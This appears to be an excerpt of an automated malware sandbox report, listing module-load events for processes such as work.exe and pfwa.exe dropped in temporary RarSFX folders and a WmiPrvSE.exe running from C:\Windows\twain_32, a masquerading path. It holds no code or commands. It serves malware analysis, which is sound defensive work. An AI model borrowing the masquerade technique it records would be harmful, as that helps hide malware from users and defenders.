Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rtutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winhttp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: propsys.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dlnashext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wpdshext.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: urlmon.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iertutil.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: srvcli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: netutils.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wintypes.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: appresolver.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: slc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sppc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: mswsock.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: napinsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wshbth.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: nlaapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dnsapi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winrnr.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: winnsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasapi32.dll
Source: C:\Windows\twain_32\WmiPrvSE.exe	Section loaded: rasman.dll
